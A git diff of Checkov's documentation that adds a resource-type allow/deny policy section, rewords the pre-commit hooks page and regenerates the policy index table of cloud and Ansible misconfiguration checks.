index e774c60e02f..3652f89765d 100644
--- a/docs/3.Custom Policies/YAML Custom Policies.md
+++ b/docs/3.Custom Policies/YAML Custom Policies.md
@@ -58,7 +58,8 @@ The top level object under `definition` must be a single object (not a list). It ## Types of Definition Blocks * **Attribute Blocks:** The policy describes resources with a certain configuration as defined by a configuration **attribute** and its value (per Terraform), or by the presence/absence of an attribute. -* **Connection State Blocks** - The policy describes resources in a particular **Connection state**; either connected or not connected to another type of resource (for example, a security group). +* **Connection State Blocks:** The policy describes resources in a particular **Connection state**; either connected or not connected to another type of resource (for example, a security group). +* **Resource Type Blocks:** The policy describes resource types that are either allowed or forbidden to use, commonly referred to as allow/deny lists. ### Using AND/OR Logic A policy definition may include multiple blocks (**Attribute**, **Connection state** or both), associated by **AND/OR** logic. @@ -253,6 +254,22 @@ definition: *Note: The condition above uses AND logic. See [additional examples](https://www.checkov.io/3.Custom%20Policies/Examples.html) for complex logic in policy definitions.* +## Resource Type Blocks + +A **Resource Type Block** in a policy's definition indicates that a resource will be compliant/non-complaint depending on the resource type, which is allowed/forbidden. Use the `exist` operator to define an allowlist and the `not_exist` operator to define a blocklist. + +### Resource Type Block Example + +The Resource Type Block in the `definition` in the example below is used to ensure CloudHSM cluster won't be provisioned: + +```yaml +definition: + cond_type: "resource" + resource_types: + - "aws_cloudhsm_v2_cluster" + operator: "not_exists" +``` + ## Using AND/OR Logic The Prisma Cloud platform allows you to combine definition blocks using AND/OR operators. 
diff --git a/docs/4.Integrations/pre-commit.md b/docs/4.Integrations/pre-commit.md index 69a22c9f374..82d06926b0e 100644 --- a/docs/4.Integrations/pre-commit.md +++ b/docs/4.Integrations/pre-commit.md @@ -1,15 +1,16 @@ --- layout: default published: true -title: Pre-Commit +title: Pre-Commit Hooks nav_order: 6 --- -# Pre-Commit +# Pre-Commit Hooks -If you want to automatically run `checkov` when files in your git repo change, [install the pre-commit binary](https://pre-commit.com/#install), and add a [.pre-commit-config.yaml file](./.pre-commit-config.yaml) to your project with content similar to the example below. +To automatically run Checkov whenever files in your Git repository change, first [install the pre-commit binary](https://pre-commit.com/#install) and then add a [.pre-commit-config.yaml](https://github.com/bridgecrewio/checkov/blob/main/.pre-commit-config.yaml) file to your project with content similar to the example below. -Note that depending on the hook id you select for pre-commit hooks, you may need to provide the following: + +NOTE: Depending on the hook id you select for pre-commit hooks, you may need to provide the following: * For the `python` hooks, pre-commit 3.x is able to provide [python](https://pre-commit.com/#python) without additional dependencies. * For the `container` hooks, the [Docker](https://docs.docker.com/get-docker/) CLI and a container runtime must be available. diff --git a/docs/5.Policy Index/all.md b/docs/5.Policy Index/all.md index 90d1d609ecc..5bd974a6fb7 100644 --- a/docs/5.Policy Index/all.md +++ b/docs/5.Policy Index/all.md 
@@ -6,3703 +6,3970 @@ nav_order: 1 # all resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|------|--------------------------|----------------------------------|--------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | -| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | -| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | Ensure no 
security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | -| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | -| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | -| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | -| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | -| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | -| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | -| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | 
[OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) | -| 12 | CKV_ALI_11 | resource | alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) | -| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) | -| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) | -| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) | -| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) | -| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) | -| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires 
at least one lowercase letter | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) | -| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) | -| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) | -| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) | -| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) | -| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) | -| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) | -| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM 
enforces MFA | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) | -| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) | -| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) | -| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) | -| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) | -| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) | -| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) | -| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | 
[K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) | -| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) | -| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) | -| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) | -| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) | -| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) | -| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) | -| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | 
[MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) | -| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) | -| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) | -| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) | -| 43 | CKV_ANSIBLE_1 | resource | [?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 44 | CKV_ANSIBLE_1 | resource | [?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 45 | CKV_ANSIBLE_1 | resource | [].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 46 | CKV_ANSIBLE_1 | resource | [].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | 
[UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 47 | CKV_ANSIBLE_1 | resource | [].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 48 | CKV_ANSIBLE_1 | resource | [].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 49 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 50 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 51 | CKV_ANSIBLE_1 | resource | [].tasks[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 52 | CKV_ANSIBLE_1 | resource | [].tasks[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 53 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | 
[UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 54 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 55 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 56 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 57 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 58 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 59 | CKV_ANSIBLE_2 | resource | [?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 60 | CKV_ANSIBLE_2 | resource | [?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | 
Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 61 | CKV_ANSIBLE_2 | resource | [].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 62 | CKV_ANSIBLE_2 | resource | [].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 63 | CKV_ANSIBLE_2 | resource | [].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 64 | CKV_ANSIBLE_2 | resource | [].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 65 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 66 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 67 | CKV_ANSIBLE_2 | resource | [].tasks[?"ansible.builtin.get_url" != 
null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 68 | CKV_ANSIBLE_2 | resource | [].tasks[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 69 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 70 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 71 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 72 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 73 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | 
[GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) |
-| 74 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) |
-| 75 | CKV_ANSIBLE_3 | resource | [?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 76 | CKV_ANSIBLE_3 | resource | [?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 77 | CKV_ANSIBLE_3 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 78 | CKV_ANSIBLE_3 | resource | [].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 79 | CKV_ANSIBLE_3 | resource | [].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 80 | CKV_ANSIBLE_3 | resource | [].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | 
[YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 81 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 82 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 83 | CKV_ANSIBLE_3 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 84 | CKV_ANSIBLE_3 | resource | [].tasks[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 85 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 86 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 87 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | 
[YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 88 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 89 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 90 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) |
-| 91 | CKV_ANSIBLE_4 | resource | [?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 92 | CKV_ANSIBLE_4 | resource | [?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 93 | CKV_ANSIBLE_4 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 94 | CKV_ANSIBLE_4 | resource | [].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | 
[YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 95 | CKV_ANSIBLE_4 | resource | [].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 96 | CKV_ANSIBLE_4 | resource | [].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 97 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
